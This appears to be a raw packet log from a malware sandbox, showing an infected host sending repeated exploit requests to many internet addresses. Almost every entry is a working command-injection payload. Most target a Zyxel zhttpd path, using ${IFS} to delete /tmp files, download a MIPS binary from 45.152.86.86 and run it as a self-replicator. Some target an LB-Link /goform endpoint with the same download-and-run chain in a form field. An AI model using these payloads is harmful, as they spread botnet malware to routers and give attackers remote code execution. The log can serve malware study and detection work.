                                        Mar 31, 2024 09:20:20.153295994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        661192.168.2.2350542138.98.225.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153328896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        662192.168.2.2344028165.134.104.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153372049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        663192.168.2.2338936132.199.181.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153419971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        664192.168.2.234963650.125.160.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153472900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        665192.168.2.2345898107.181.51.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153527021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        666192.168.2.2358284118.201.152.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153568029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        667192.168.2.234539020.252.230.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153618097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        668192.168.2.2359210210.47.174.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153666973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        669192.168.2.233775279.145.162.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153702974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        670192.168.2.234285878.161.172.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160535097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        671192.168.2.234440027.3.201.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160574913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        672192.168.2.2350236123.157.66.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160640001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        673192.168.2.234026657.163.187.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160670996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        674192.168.2.233497687.161.158.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160723925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        675192.168.2.2355856193.217.176.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160762072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        676192.168.2.23522205.177.177.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160808086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        677192.168.2.233902479.186.130.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160845041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        678192.168.2.234466869.252.53.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160891056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        679192.168.2.2349928109.77.90.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160929918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        680192.168.2.2339546112.58.99.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.160986900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        681192.168.2.2343768220.69.33.2428080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.587915897 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:20.874789000 CEST1010INHTTP/1.1 400
                                        Content-Type: text/html;charset=utf-8
                                        Content-Language: ko
                                        Content-Length: 843
                                        Date: Sun, 31 Mar 2024 07:20:20 GMT
                                        Connection: close
                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 ec 83 81 ed 83 9c 20 34 30 30 20 e2 80 93 20 ec 9e 98 eb aa bb eb 90 9c 20 ec 9a 94 ec b2 ad 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 ec 83 81 ed 83 9c 20 34 30 30 20 e2 80 93 20 ec 9e 98 eb aa bb eb 90 9c 20 ec 9a 94 ec b2 ad 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e ed 83 80 ec 9e 85 3c 2f 62 3e 20 ec 83 81 ed 83 9c 20 eb b3 b4 ea b3 a0 3c 2f 70 3e 3c 70 3e 3c 62 3e ec 84 a4 eb aa 85 3c 2f 62 3e 20 ed 81 b4 eb 9d bc ec 9d b4 ec 96 b8 ed 8a b8 20 ec 98 a4 eb a5 98 eb a1 9c ec 84 9c 20 ec 9d b8 ec a7 80 eb 90 9c 20 ec 96 b4 eb 96 a4 20 eb ac b8 ec a0 9c eb a1 9c 20 ec 9d b8 ed 95 98 ec 97 ac 2c 20 ec 84 9c eb b2 84 ea b0 80 20 ed 95 b4 eb 8b b9 20 ec 9a 94 ec b2 ad ec 9d 84 20 ec b2 98 eb a6 ac ed 95 a0 20 ec 88 98 20 ec 97 86 ea b1 b0 eb 82 98 2c 20 ec b2 98 eb a6 ac ed 95 98 ec a7 80 20 ec 95 8a ec 9d 84 20 ea b2 83 ec 9e 85 eb 8b 88 eb 8b a4 2e 20 28 ec 98 88 3a 20 ec 9e 98 eb aa bb eb 90 9c 20 ec 9a 94 ec b2 ad 20 eb ac b8 eb b2 95 2c 20 ec 9c a0 ed 9a a8 ed 95 98 ec a7 80 20 ec 95 8a ec 9d 80 20 ec 9a 94 ec b2 ad 20 eb a9 94 ec 8b 9c ec a7 80 20 66 72 61 6d 69 6e 67 2c 20 eb 98 90 eb 8a 94 20 ec 8b a0 eb a2 b0 ed 95 a0 20 ec 88 98 20 ec 97 86 eb 8a 94 20 ec 9a 94 ec b2 ad 20 eb 9d bc ec 9a b0 ed 8c 85 29 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 33 37 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!doctype html><html lang="ko"><head><title>HTTP 400 </title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP 400 </h1><hr class="line" /><p><b></b> </p><p><b></b> , , . (: , framing, ).</p><hr class="line" /><h3>Apache Tomcat/9.0.37</h3></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        682192.168.2.2349524121.25.205.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.147872925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        683192.168.2.2355414173.235.218.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.147934914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        684192.168.2.236073653.82.96.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.147972107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        685192.168.2.235915039.192.80.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148045063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        686192.168.2.2344282181.43.97.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148128986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        687192.168.2.233593445.217.213.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148148060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        688192.168.2.2340394181.10.45.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148236990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        689192.168.2.234724883.250.79.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148256063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        690192.168.2.23451782.41.96.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148324966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        691192.168.2.235715883.79.158.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148356915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        692192.168.2.2350008155.23.244.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148391008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        693192.168.2.235066848.59.73.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148457050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        694192.168.2.2343598131.99.132.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148492098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        695192.168.2.235856042.78.41.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148547888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        696192.168.2.2356684154.21.156.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148600101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        697192.168.2.2347532111.202.17.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148644924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        698192.168.2.2332792122.158.70.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148685932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        699192.168.2.23410362.123.30.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148747921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        700192.168.2.235689287.23.211.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148781061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        701192.168.2.233557499.60.231.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148854017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        702192.168.2.2340506148.26.112.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148894072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        703192.168.2.2360124140.122.188.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148931026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        704192.168.2.233409486.85.110.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.148972034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        705192.168.2.235204697.200.3.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.149019957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        706192.168.2.2337394115.33.37.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.149082899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        707192.168.2.2335576113.77.106.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.149163961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        708192.168.2.234809469.221.181.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.149199963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        709192.168.2.234733467.152.170.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.149279118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        710192.168.2.2353078206.144.175.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.149418116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        711192.168.2.2354896139.247.83.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.150105000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        712192.168.2.234389624.104.188.28080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.429702044 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:21.570322990 CEST64INHTTP/1.0 302 Redirect
                                        X-Frame-Options: SAMEORIGIN


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        713192.168.2.2357976172.87.198.1218080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:21.484889030 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
